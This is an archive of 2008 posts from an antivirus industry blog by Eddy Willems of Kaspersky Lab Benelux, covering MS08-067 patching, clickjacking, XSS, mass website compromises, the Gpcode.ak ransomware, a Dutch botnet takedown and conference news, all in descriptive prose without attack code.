WAVCi

Looking what's happening within malicous PDF's...

noreply@blogger.com (Eddy Willems) — Tue, 11 Nov 2008 14:12:00 +0000

During Infosec.nl as blogged before(my former posting) I will talk about the virus analyst's daily work. One nice tool which could fit in is one of the tools created by Didier Stevens, a friend blogger.
On his blog he describes how he can reconstruct by use of this tool the trial-and-error process of the malware writer by looking at the incremental updates and metadata within the malicous pdf.
Nice reading at this link:
http://blog.didierstevens.com/2008/11/10/shoulder-surfing-a-malicious-pdf-author/

A virusanalyst in 15 minutes? (at Infosecurity.nl 2008)

noreply@blogger.com (Eddy Willems) — Thu, 06 Nov 2008 13:51:00 +0000

Is it possible to become a virusanalyst in 15 minutes? That's the question which will be answered during my presentation at Infosecurity.nl . If you want to have a look at the daily work of an analyst or want to become one, this is a must!
You can find more info at the website www.infosecurity.nl
I will be also available at the venue in Utrecht
during the 2 days at our booth 08D060.
The case study and presentation will be given in room 9. (14:45-15:15 daily)
A lot of people already registered to attend this presentation, so hurry up if you want to be there!

MS08-067 problems continued ...

noreply@blogger.com (Eddy Willems) — Wed, 05 Nov 2008 14:53:00 +0000

The first reports of a worm capable of exploiting the MS08-067 vulnerability are showing up. The dropped components include a kernel mode DDOS-bot that currently has a selection of Chinese targets in its configuration. The worm component is detected as Exploit.Win32.MS08-067.g by Kapsersky Lab. Other names can be used by other AV vendors. (Exploit:Win32/MS08067.gen!A = Microsoft's name)

POC binaries for MS08-067 seen...

noreply@blogger.com (Eddy Willems) — Fri, 31 Oct 2008 13:40:00 +0000

The first Proof of Concept binaries that target the MS08-067 vulnerability have been seen. The payload's function is to add the guest account to the administrators group, thus allowing unlimited access to the machine. Let's keep an eye on it ...

EstDomains is not dead yet ...

noreply@blogger.com (Eddy Willems) — Fri, 31 Oct 2008 13:24:00 +0000

The EstDomains story continues. ICANN received a response from EstDomains, and the termination has been stayed.
You can read the details here.
What a good lawyer can do these days isn't it?
What could I say ..., 'postponing of execution' ... I hope.

EstDomains is dead ...

noreply@blogger.com (Eddy Willems) — Thu, 30 Oct 2008 19:34:00 +0000

EstDomains is a domain registrar operating from Estonia. They've been the largest registrar used by online criminals for their domain name registration needs. ICANN has pulled the plug on EstDomains, and is removing EstDomains from the list of ICANN-accredited registrars. Most of us first ran into EstDomains in 2005, when investigating the infamous WMF vulnerability. Initially the main site distributing malicious WMF files, unionseek.com, was registered via this new Estonian registrar.
Since then, tens of thousands of malicious domains have been registered with EstDomains. These include drive-by-download sites, botnet command-and-control servers, spammed domains and so on.

So this is really good news but it took a long time for ICANN to do this.
Nevertheless ... thank you ICANN.
You can read more at the Blogs from F-Secure and McAfee.

MS08-067 vulnerability could hit us hard if we don't patch.

noreply@blogger.com (Eddy Willems) — Thu, 30 Oct 2008 19:29:00 +0000

Apply the patch referred to in MS08-067 right away, because Trojan horses that take advantage of this security breach are sure to hit us soon. The vulnerability is similar to the hole that was used by the MSBlaster worm, which surfaced on the Internet in 2003. So don't let down your guard. Patch your PC if you haven't already done so, because this exploit is sure to be the focus of malware authors before long.
Since it's only a matter of time until such attacks become widespread, I urge you to reach out to other Windows users you know to ensure that they're protected from this vulnerability — once you've patched your own systems, that is. And oh yes, don't forget to reboot after the patch! A lot of users seems to forget this and this is really needed.

Clickjacking: A security problem for all browsers.

noreply@blogger.com (Eddy Willems) — Wed, 29 Oct 2008 19:11:00 +0000

At the moment of writing most browsers are still susceptible to clickjacking, but you can take steps to reduce the risk. But what is Clickjacking really?

Clickjacking allows an attacker to use one or more of several new attack scenarios to literally steal your mouse clicks. When you think you're clicking on a simple button — for example, to see the next page of an article — you may actually be giving the bad guys permission to do something entirely different, such as log on to your online checking account.

By taking advantage of any of a growing number of recently discovered vulnerabilities in Microsoft's Internet Explorer, Mozilla's Firefox, Apple's Safari, and all other Web browsers, criminals can hijack your system by intercepting clicks of what appear to be legitimate links. The problem doesn't stop there, however. At least some of the flaws that make clickjacking possible also show up in such popular Web tools as Adobe's Flash player and Microsoft's Silverlight streaming-media plug-in. If they can control where your clicks are going, they may be able to get a user to reconfigure the system so they disable security.
In clickjacking, surreptitious buttons are "floated" behind the actual buttons that you see on a Web site. When you click the button, you're not triggering the function that you expected. Instead, the click is routed to the bad guy's substitute link.
Clickjacking isn't new. In fact, it dates back to at least 2002 or 2003.
What's new is the range of browser vulnerabilities that make clickjacking possible.
There are multiple variants of clickjacking. Some of it requires cross domain access, some doesn't. Some overlay entire pages over a page, some use iFrames to get you to click on one spot. Some require JavaScript, some don't. Some variants use CSRF [Cross-Site Request Forging] to pre-load data in forms, some don't. Clickjacking does not cover any one of these use cases, but rather all of them. This doesn't mean there are no protections, however. In fact, one of the most important steps that users can take to protect themselves is to enable JavaScript only for approved sites. Disabling JavaScript has serious drawbacks, because so much of the Web's interactivity is driven by JavaScript apps. And even browsing with JavaScript disabled will not protect against all possible avenues of attack. Most browsers are vulnerable.
Besides browsers, the bad guys can also exploit Web programs such as Adobe's Flash player. For instance, one proof-of-concept demonstration shows that a hacker can use the Flash player to take over a PC's webcam and microphone. Imagine the implications of stalkers eavesdropping on your laptop's built-in camera and mic. Clickjacking vulnerabilities don't stop there; attacks may also be launched via iFrames by using cross-site scripting techniques.So disabling browser plug-ins and scripting will help but is no panacea, given the threat's complexity.

Can you stay safe in a clickjacking internet connected world?

Browser and plug-in vendors have joined organizations in describing what you can do to stay safe. Adobe, the Mozilla Foundation and Microsoft has several webpages up describing several precautions or solutions. Even taking all these precautions doesn't guarantee that your system is 100% immune to the new threat. You'll need to become more conservative in visiting untrustworthy sites until the applications you use are made more secure.
While we're all waiting for vendors to patch their products and when in doubt, ask yourself whether your mother would approve of the site. However, even on sites where you could reasonably expect to be safe from such attacks, you can still be blindsided, so always think twice before you click.

However I stay optimistic. While the threat of attack may be high for the next three to six months, I expects more complete protections to become available within the same timeframe.

A problematic MS remote code execution vulnerability fixed, please update ASAP!

noreply@blogger.com (Eddy Willems) — Fri, 24 Oct 2008 10:54:00 +0000

Yesterday Microsoft released a security update that fixes a remote code execution vulnerability in the Windows Server Service. This is a serious vulnerability and MS have seen targeted attacks using this vulnerability to compromise fully-patched Windows XP and Windows Server 2003 computers so MS have released the fix "out of band" (not on the regular Patch Tuesday). Due to the serious nature of the vulnerability and the threat landscape requiring an out-of-band release, you probably have questions about your own organization's risk level, what actions you can take to protect yourself, and why newer platforms are at reduced risk. We hope to answer those questions in this blog post.

Which platforms are at higher risk?

An unauthenticated attacker can trigger this vulnerability remotely for code execution on Windows Server 2000, Windows XP and Windows 2003. By default, Windows Vista and Windows Server 2008 require authentication. However, the attacker must be able to reach the RPC interface to exploit the vulnerability. In the default out-of-the-box scenario, the interface is not reachable due to the firewall enabled by default on Windows XP SP2, Windows Vista, and Windows Server 2008. Unfortunately, either one of the following two conditions exposes the RPC endpoint:

1) Firewall is disabled
2) Firewall is enabled but file/printer sharing is also enabled.

When File/Printer Sharing is enabled on Windows Vista and Windows Server 2008, the firewall only expose the RPC interface to the network type shared. For example, if a printer is shared on a network type ‘Private’, the firewall will block incoming RPC connections if the computer switches over to a network type ‘Public’. If you then choose to share the printer on the network type ‘Public’, Vista and Windows Server 2008 will prompt to ask if you really want to enable “File and Printer Sharing” for ALL public networks.

For more information about file/printer sharing, visit the following URLs:

- for Vista http://technet.microsoft.com/en-us/library/bb727037.aspx
- for XP http://www.microsoft.com/windowsxp/using/security/learnmore/sp2firewall.mspx

Most perimeter firewalls will block exploit attempts from outside your organization

If you are behind a perimeter firewall that filters inbound connections to TCP ports 139 and 445, you will not be reachable from the Internet. This is a common home user scenario. In this scenario, only the machines in your local LAN will have the ability to exploit this vulnerability.

How you can protect yourself

You should apply the security update as soon as you can. This is the best way you can protect yourself. While you are testing the update and preparing your deployment process, you may choose to use one or more of the workarounds listed in the security bulletin. ( http://www.microsoft.com/technet/security/Bulletin/MS08-067.mspx )

Everyone could become a cyber-criminal? I'm not sure...

noreply@blogger.com (Eddy Willems) — Tue, 21 Oct 2008 09:15:00 +0000

Or in Dutch 'Iedereen kan een cyber-crimineel worden' quoted out of the Standaard, a newspaper in Belgium.
You can find the article here.

Well this is my reaction to this article and I do not completely agree!
The problem lays in our mindset and as long as everybody is not thinking in the correct way we will face indeed a problem. It's something I already told the public back in 2004. The general public and children do not seem to know what computer security is. And it all goes back to what we teach our children and that's the real problem in my opinion. We don't teach children well these times. My research found out that some of them even find the idea of becoming a hacker or a virus writer ‘cool’. Although some families use parental control mechanisms to secure their home computer networks, many children know how to bypass these mechanisms. Generally, it seems that our children’s knowledge of ethical
computer behaviour and good ‘netiquette’ are a long way off target.

And it's not only children anymore these days. This article in 'De Standaard' is a perfect example 'unfortunately'! Was it really necessary to show the real problem to the public and go the press with it? Do you as a reader of this blog still know the line between good and bad on the internet? I doubt it.

A suggestion as to how we may begin to influence students and young people is by using societal control. An example of how this has worked in the past is with the issue of drink-driving. At one time, drinking and driving was a personal choice, but
as society witnessed some of the consequences of the combination of the two activities, we began to pass laws which restricted such behaviour. Initially there was some resistance to these laws – people saw them as an infringement on their rights. However, as the laws became more widely accepted, people began to refuse to drink and drive on the principle that it is ‘wrong’ to do so.
Policy makers and law makers are very aware of this form of societal control. However, they are less aware of the societal structure of ‘cyberspace’, and for this reason there is the danger that the laws they make will not create the desired ethical model, and conversely will create a backlash or revolutionary movement. By taking time to develop realistic policies and effective laws, it is possible we can
avoid such a reaction. The speed with which global electronic communication is
developing has brought with it an enormous benefit to all those fortunate enough to be able to exploit it. However, it has also brought opportunities to those who are willing to abuse it. The way in which it has introduced relative and absolute
anonymity for its users may encourage acts which would otherwise have appeared to be too risky to the perpetrator. Its very nature may encourage various kinds of anti-social activities, ranging from innocent pranks through serious malicious damage to data and individuals, and downright criminal fraud. As a result of the fact that many of its principle users are relatively young, or people who may be impressionable or unprincipled, an ethos has developed in the Internet
community, in which it is ‘cool’ to be an outlaw. Moreover, the inherent power embodied in being able to control the ‘system’ is potentially irresistible.
Resources that would enable us to emphasize and integrate ethical computing behaviour may provide a stabilizing influence. Our computing environments are very vulnerable regarding distribution of information – after all, it is what
they were designed to do. If we want to change people’s behaviour and reduce the
attractiveness of becoming a virus writer or hacker, we must start ethical computer education at a much earlier age. I think the way forward is to recognize the different factors introduced by computer technology – factors we have long
ignored. If we don’t, the technology may ultimately be self-destructive.
But that's not what you always read in the newspapers, isn't it? ;-)

PiggyBacking is not allowed in Belgium.

noreply@blogger.com (Eddy Willems) — Thu, 16 Oct 2008 18:18:00 +0000

During my visit to the Virus Bulletin conference 2008 2 weeks ago a man was arrested in Belgium for using someone else's unsecured Wifi connection to get on the Internet. (More details in Dutch available here).
The case is interesting because the only thing this guy did was use the connection to get onto the Internet - what we call Wifi "piggybacking," or logging on to someone's open 802.11b/g/n network without their knowledge or permission. And quite a lot fo countries (such as the UK and Belgium) have laws making this illegal. Stealing Wifi Internet access may feel like a victimless crime, but it's wrong nonetheless. You could be depriving ISPs of revenue. Furthermore if you've hopped onto your next door neighbors' wireless broadband connection to illegally download movies and music from the Internet, chances are that you are also slowing down their Internet access and impacting on their download limit. From a security point of view, if someone can access your network, they can misuse that network, and (potentially) the computers on it. And Belgian law enforcement want to make an example of the man arrested last week. So to stay on the right side of the law, do yourself a favour: don't go using anyone else's network without permission. And make sure that your network and router are secured - you may be ethical, but that doesn't mean that everyone else is.

If you want to read more about this, please read also my posting from 10 October at the weblog from Kaspersky Lab.

Eugene Kaspersky and David Perry working for ESET?

noreply@blogger.com (Eddy Willems) — Fri, 10 Oct 2008 13:18:00 +0000

Of course they are not! This is just one of the many pictures I've taken during the Virus Bulletin Conference 2008 in Ottawa. It was my 13the VB in a row! And again everybody was overloaded with good presentations ranging from the definition of Cybercrime via Russian spam and botnets to phishing related to the recent worldwide 'bank-problem'. You always can find an interesting subject and if you didn't the networking possibilities are nearly endless. Kaspersky Lab, the company I am working for, was present with 3 speakers and a large team of delegates.

You can see my colleagues Costin Raiu, Roel Schouwenberg and me in the second picture.

You can find my pictures from VB 2008 at this link.
You can even find older pictures from some older events as well over there.

I also put up a movie from the event online at my iTunes and YouTube Channels:

And there are Kaspersky Lab (Internet Security Suite 2009) prices for the first 5 correct answers...

On my way to the VB conference ...

noreply@blogger.com (Eddy Willems) — Sun, 28 Sep 2008 16:15:00 +0000

Indeed I'm on my way to the the VB conference in Ottawa, Canada. WOW ... This is my number 13 of all the Virus Bulletin conferences. I've been attending since 1996 (Brighton, UK) and I can assure you that this is the best conference if you are in the anti-malware industry. You can find more from the conference itself at the VB website. As always I will post some pictures over here afterwards or during the conference. And BTW if you're not there, you're either sick or dead or you just don't belong to that part of the industry. It's simple as that! ;-)

GeenStijl and GeenCommentaar: 0/10 ..Unethical in every aspect!

noreply@blogger.com (Eddy Willems) — Tue, 23 Sep 2008 17:43:00 +0000

It's been a bit of a bumpy ride on the Dutch part of the internet over the last couple of days. One blog - www.geencommentaar.nl - decided to set up something I like to call a 'web 2.0 honeypot' in the form of a petition. The idea behind this was to attract the attention of the biggest blog in the Netherlands - www.geenstijl.nl - and get GeenStijl readers to comment. GeenCommentaar logged the IP addresses of users who made offensive comments on the blog and created a database. (A lot of the offensive comments came from GeenStijl users). Other bloggers could then check the database to see if a particular IP address had been tagged as offensive. Supposedly the idea behind this was to make life easy for other site/ blog owners, by offering an automatic way to filter out (probably) unwanted comments/ content. When GeenStijl realized what was happening, they responded with a vengeance by adding a piece of Javascript to their page. This meant when anyone visited the GeenStijl site, a random IP address was generated, and the GeenCommentaar database would be queried to see if the IP address had been tagged as offensive. All of this was done automatically and without visitors to the site knowing anything about it.
The result? GeenCommentaar's server couldn't handle the load; as well as GeenCommentaar getting hit, some other sites running on the same server were overloaded. In addition to the obvious ethical objections, both the parties involved are breaking the law.
BTW Kaspersky Lab added detection for this DDoS script as Trojan-Clicker.JS.Small.p .

If you want to read more about it
please look at my colleague Roel's comment at
Kaspersky Virus Analyst's Diary
or read my own comments in Dutch at webwereld.nl
A lot of people seems not to think anymore about what seems to be good or bad on the internet. They just act and play like 'criminal' children without notice! Unbelievable!
Well ... at least their names are well chosen: no comment with no style.

Back from Govcert.nl 2008

noreply@blogger.com (Eddy Willems) — Sun, 21 Sep 2008 15:38:00 +0000

I'm just back from the Govcert.nl Symposium 2008 in Rotterdam. It's very interesting to watch how much money the Government of the Netherlands can invest in such kind of events. Most other events are heavily sponsored to make such events possible ... Congrats to Govcert.nl and very well done however if you are a real pro or an anti-virus/malware insider it was not that inspiring. I loved however the key note speeches and especially the 'no press allowed' presentation of the arrests made by the joint efforts of the NHCU and FBI. The case which you can find more background of in my former postings (see August) and which I was also involved in. You still can find the full programme details at http://www.govcert.nl/symposium .

Goodie Security Picture of the Month

noreply@blogger.com (Eddy Willems) — Sun, 07 Sep 2008 14:09:00 +0000

Busy weeks for me ... yes a lot of business and a lot of events to attend to that's what was happening the past weeks. From now I will post a picture from all these events on my blog. Last week we got two nice launching events for our Kaspersky Hosted Security Solution in the Netherlands and Belgium organised by 2 of our distributors. The week before I attended a BBQ event at Copaco Belgium. This week I will attend and speak at the L-Sec Security Conference on Friday. You can have a look at the other speakers on their website at http://www.lsec.be . I will present: 'A Virus Analyst in 15 Minutes?' .

Further on I was cleaning up a little bit my attic where I found a lot of old and newer security goodies (the free give-aways at conferences). So from now on I am going to use the good ones after I throwed away some other rubbish. For this job I got the wonderful help from a Symantec display box. On the picture you can see how you could use it in a creative way. ;-)
BTW It's just coincidence that I used a Symantec 'box' for it.
Other display boxes are also quite good.
This time this picture becomes the Security Goodie of the month!

Kaspersky Lab helps Dutch police dismantle Shadow botnet.

noreply@blogger.com (Eddy Willems) — Wed, 13 Aug 2008 13:06:00 +0000

FYI: This was the press release which I spoke about in my former blog posting.

The Dutch High Tech Crime Unit identified a large botnet when they arrested a 19 year old Dutch man last week. The Unit asked Kaspersky Lab, a leading developer of secure content management solutions, to provide the victims with instructions on how to neutralize the malware on their systems; neutralizing the malware ultimately brings down the botnet. This is an excellent example of the close co-operation which exists between the antivirus industry and law enforcement.

At the request of the Dutch police, Kaspersky Lab created detailed instructions on how to remove the malware. The Dutch police have pointed victims towards a page on the Kaspersky Lab website which contains the removal instructions, and also to a website which gives victims the opportunity to make a formal complaint to the police. Eddy Willems, Security Evangelist with Kaspersky Lab Benelux, who worked closely with the High Tech Crime Unit, believes this case clearly illustrates how the security industry can help law enforcement in the fight against cybercrime. A spokesperson for the Public Prosecution Service agrees: “The Public Prosecution Service and the police worked together with Kaspersky Lab on this case with full contentment”.

The so-called Shadow botnet is made up of around 100,000 infected machines from all over the world. A botnet is a collection of computers infected with malware which are then linked into a network. The infected machines can be controlled remotely (without their owners' knowledge or consent) and used by criminals to send spam, attack websites, or steal confidential data such as credit card numbers.

Last week the Dutch police arrested a 19 year old Dutch man for selling this botnet to a Brazilian who was also arrested. The arrests were the result of an operation conducted by the High Tech Crime Unit and the FBI.

If you think you're a victim
If you think your computer is part of the botnet, please follow the removal instructions at www.kaspersky.com/shadowbot. However, the removal instructions only apply to the malware which has been used to create the botnet. Eddy Willems warns: “These programs may have downloaded additional malware to computers which were part of the botnet. So users should make sure they perform a full scan of their machine using an up-to-date antivirus solution." If you have Kaspersky® Internet Security or Kaspersky® Anti-Virus running on your computer, you do not need to follow the instructions, as the software will automatically detect and delete the malware.

I'm back!

noreply@blogger.com (Eddy Willems) — Wed, 13 Aug 2008 12:49:00 +0000

Is Eddy Willems dead? How can we reach Eddy?
Several people sent me some emails because they were worried about what happened to Eddy.... he's not blogging anymore.
Well there are some good reasons why you didn't hear from me ...
First of all I was terribly sick with fever sometimes higher than 39,5 C. A duo biological Salmonella bacteria infected me seriously and I was several weeks out. And it was also very bad timing: it just happened before the main Kaspersky event of the year! This was possibly the first conference or event I'm missing within 20 years time.
However I recovered quite well and just afterwards my vacation period was popping up meaning ... no worries, no calls, no media. That's possibly what you think.
You are of course wrong because I even did a few interviews and two television interviews during my vacation.
Both of them can be viewed at my press page from my site.

Starting from today I'm starting again blogging and there is more reason than you think .. a lot of things already happened going from a Kaspersky press release together with the Natinional High Tech Crime Unit of the Dutch police to the bizar race-to-zero creation and test case!
A case I already spoke about to the press some months ago.

Kaspersky Lab Benelux goes sailing ...

noreply@blogger.com (Eddy Willems) — Wed, 25 Jun 2008 15:40:00 +0000

More or less without words ...

Each distributor got their own boat and there was a race between them ...

And DCB, our new Belgian distributor, won the race!

BTW I was part of the 'press boat' and took all these pictures.
;-)

GPCode.ak solution in another way ...

noreply@blogger.com (Eddy Willems) — Sun, 15 Jun 2008 14:47:00 +0000

Currently, it's not possible to decrypt files encrypted by Gpcode.ak without the private key. However, there is a way in which encrypted files can be restored to their original condition. When encrypting files, Gpcode.ak creates a new file next to the file that it intends to encrypt. Gpcode writes the encrypted data from the original file data to this new file, and then deletes the original file. It's known that it is possible to restore a deleted file as long as the data on disk has not been significantly modified. This is why, right from the beginning, we recommended users not to reboot their computers, but to contact us instead. We told users who contacted us to use a range of utilities to restore deleted files from disk. Unfortunately, nearly all the available utilties are shareware – we wanted to offer an effective, accessible utility that could help restore files that had been deleted by Gpcode. Please have a look at the blog's posting from my colleague Vitaly at Kaspersky's Viruslist Blog from 13 June 2008.
Kaspersky got a lot of comments and critics even from respected and known security people like Bruce Schneier, Vesselin Bontchev and others but what none of them were looking at was the easy solution: just try to recover the files before they were encrypted. I fully agree with them that searching for the decryption key using brute-force computing power would be very unrealistic but still, I like at least the idea of an international cooperation between a lot of security companies ... maybe it's 'insecure' thinking from myself if you know what I mean. ;-)

Typosquatting in Belgium on the rise.

noreply@blogger.com (Eddy Willems) — Sun, 15 Jun 2008 13:17:00 +0000

Typosquatting, also called URL hijacking, is a form of cybersquatting which relies on mistakes such as typographical errors made by Internet users when inputting a website address into a web browser. Should a user accidentally enter an incorrect website address, they may be led to an alternative website owned by a cybersquatter.
It seems that we got more or less a rise in typosquatting the last years over here in Belgium. I was interviewed yesterday and made it in the news at 13 and 19 o'clock at VTM, a known Belgian TV station. You can have a look at the recorded broadcast at my press page or via my direct link.

China hacking into US computers more realistic than China attacking Belgium!

noreply@blogger.com (Eddy Willems) — Thu, 12 Jun 2008 07:58:00 +0000

You could read the following on the net just a few hours ago: Multiple congressional computers have been hacked by people working from inside China, lawmakers said Wednesday, suggesting the Chinese were seeking lists of dissidents. You can find more at
http://news.yahoo.com/s/ap/20080611/ap_on_go_co/china_hacking
This attack is much more realistic as a targeted attack and has much more evidence if you compare this to what our government a month ago was saying. I blogged about it the 2nd of May at:
http://www.anti-malware.info/weblog/archive/2008_05_01_wavci_archive.html
I'm nearly 100% sure that the Belgian version was not orchestrated and that everything was just a coincidence of a lot of spammed malware to some of the governmental computers. I'm still not happy what some of the members from our government told the public at that moment.

Assistance needed for cracking GPCode.ak ...

noreply@blogger.com (Eddy Willems) — Tue, 10 Jun 2008 09:57:00 +0000

Our office just launched the following press release following the recent problems with a new GPCode variant. See more at www.viruslist.com .

"Kaspersky Lab, announces the Stop Gpcode, an international initiative against the blackmailing virus Gpcode which emerged last week.
The objective of the initiative is to factor (‘crack’) the RSA-1024 key used in Virus.Win32.Gpcode.ak – the latest version of the dangerous Gpcode blackmailer virus. The signature for Virus.Win32.Gpcode.ak was added to Kaspersky Lab antivirus databases on June 4, 2008.
Kaspersky Lab invites all cryptography experts, as well as governmental and research institutions, other antivirus vendors and independent researchers to join the efforts to solve this problem. The company is prepared to provide any additional information at its disposal and is open to dialog with all experts wishing to participate in the Stop Gpcode initiative.
To coordinate the activity of all participants of the initiative, a special Stop Gpcode forum has been created. "This is the first time in the security history that such an initiative is appearing. Let us hope that this could become a good example of perfect international cooperation. However we must not overestimate this possible solution: a backup in combination with optimal security and good malware protection is still the best solution for a lot of problems, also in the future." says Eddy Willems, Security Evangelist at Kaspersky Lab Benelux.
Virus.Win32.Gpcode.ak
Gpcode.ak encrypts files with different extensions by using a RSA encryption algorithm with a 1024 bits key. After encrypting, the virus changes the extension of these files to ._CRYPT and places a text file named !_READ_ME_!.txt in the same folder. In the text file the criminal tells the victims that the file has been encrypted and offers to sell them a decryptor.
The author of Gpcode has taken two years to improve the virus: the previous errors have been fixed and the key has been lengthened to 1024 bits instead of 660. The task of ‘cracking’ the RSA-1024 key is an extremely complicated cryptographic problem. Eddy Willems confirms this: “To crack the key at least 15 million computers have to be running for one year.”."

Of course it's clear that this is just an interesting initiative and I really hope it could be realistic in the near future but of course it's not so easy as it seems.
Nevertheless such initiatives haven't been seen in the past and I think it's time that vendors could work together in a better way then before but is that not another harder question. Could this be even more unrealistic? What do you think?

Kaspersky Lab Benelux 5 years old!

noreply@blogger.com (Eddy Willems) — Sun, 01 Jun 2008 13:00:00 +0000

This weekend we celebrated our fifth 'local office Kaspersky Lab' anniversary with a sleepover in a nice hotel in Valkenburg near Maastricht(NL). If you look at the picture you can find all employers including me on the picture which was given to our COO Dick Gehéniau.

May 2008: Web site compromises record month!

noreply@blogger.com (Eddy Willems) — Sun, 01 Jun 2008 12:06:00 +0000

Here are the highlights of the notable Web site compromises I have seen in the past month:

May 2 - One Year Later, Italian Job Still Working Overtime

It’s been a year since the infamous Italian Job attack of 2007. And in an apparent observance of its anniversary, a similar attack was seen compromising about 90 varied Italian Web sites, all hosted in Italy by a single hosting provider—the same one that hosted the thousands in last year’s large-scale.

May 7 - A Very Convoluted Chinese Gaming-Info-Stealing Campaign

Web sites numbering approximately 9,000 were compromised via SQL injection with embedded malicious JavaScript redirecting users to two major malicious URLs. Among these Web sites were legitimate medical, educational, government, and entertainment sites from around the world.

A survey of the site locations includes India, UK, Canada, France, and China. This observation suggests the attack as the work of an automated Chinese hacktool programmed to search through Web sites for vulnerabilities, creating the same .HTML file that has been used to launch various exploits.

May 10 - More of The Same: Another Half Million Web Sites Compromised

Meanwhile, a malicious script was injected into half a million Web sites believed to be either using poorly implemented or older exploitable versions of phpBB. This event was involved a ZLOB Trojan among others that changes an affected system’s local DNS and Internet browser settings.

May 19 - Chinese Weekend Compromise

Chinese-language Web sites were targeted in an attack that was meant specifically against China, Taiwan, Singapore, and Hong Kong. Google search results at the time of the attack showed 327,000 pages containing the malicious script tag.

May 19 - More Weekend Compromises Reach Other Shores

Another string of Web site compromises was discovered the following week, involving at least four (4) Web sites of various affiliations and different countries. These were injected with a malicious JavaScript that redirects to two sites. Both eventually lead to their own series of redirections, and finally the download and execution of malware: a backdoor and Trojan, respectively.

May 21 - It’s Not Over: Asian Sites Injected with Nasty Code

Two days later, hundreds of thousands of Web sites were again found compromised and inserted with malicious JavaScript code, some of which are sites from the APAC region. Hackers have apparently conducted another massive SQL injection attack. A Google search for the malicious URL turned up 197,000 results.

May 22 - Malicious Domains Found in Compromised Japanese Sites

The next day, several Web sites in Japan — including a popular music download site and a music company site — have been found injected with malicious code.

These are the hard facts, and these developments tell us that there could indeed be a trend that cyber criminals seem to favor this type of attack over other methods. For what it’s worth, our engineers also think that mass compromises are common (or at least not as uncommon as we think), it’s just that they are either found soon enough, or they remain unnoticed and consequently unreported.

And I'm not even talking about thousand other websites which were defaced in nearly every country of the world even in Belgium (eg. VTM Broadcast site) ... it's definitely not a good sign and trend.

A lot of XSS methods seems to be used as will in those or a lot of other compromises.

XSS has been around for a long time, it has neither become less of an attractive attack method, nor has a fool-proof solution against it has been properly formulated.
XSS vulnerabilities can cause a variety of problems for the casual web surfer. These problems range in severity from mere annoyance to complete credential compromise. Some XSS attacks incorporate disclosure of the user’s session cookies, allowing an attack perpetrator to have complete control over the victim’s session and to (in effect) take over the account & hijack the HTTP session.
XSS attacks may also include redirecting the user to some other page or website, and modifying the content of a HTTP session. Other damaging risks include the exposure of the victim’s files, and subsequently the installation of Trojans and other damaging malware — and to what purpose? One can only guess because once the compromise is successful, the criminal’s next actions are open to unlimited possibility.
An XSS attacker utilizes varying methods to encode the malicious script in order to be less conspicuous to users and administrators alike. There are an unaccounted number of variations for these types of attacks, and XSS attacks can come in the form of embedded JavaScript — one of the more common implementations. But be forewarned — any embedded active content is also a potential source of danger, including: ActiveX (OLE), VBscript, Flash, and more.
XSS issues can and do exist as well in the underlying Web and application servers too. Most Web and application servers use error mechanisms to display content access error pages, such as “404 page not found “and “500 internal server error”. If these pages reflect back any information from the user’s request, such as the URL they were trying to access, there are even greater chances that they are vulnerable to an XSS attack.
The possibility that a website contains XSS vulnerabilities is extremely high. There are countless ways to mislead Web applications into relaying maliciously injected scripts. Developers and website administrators seem to have a knack for missing these vulnerable application areas in their web implementations, but finding these configuration errors seems to be a walk in the park for attackers, since all they need is a browser and time (time which most of us don’t have).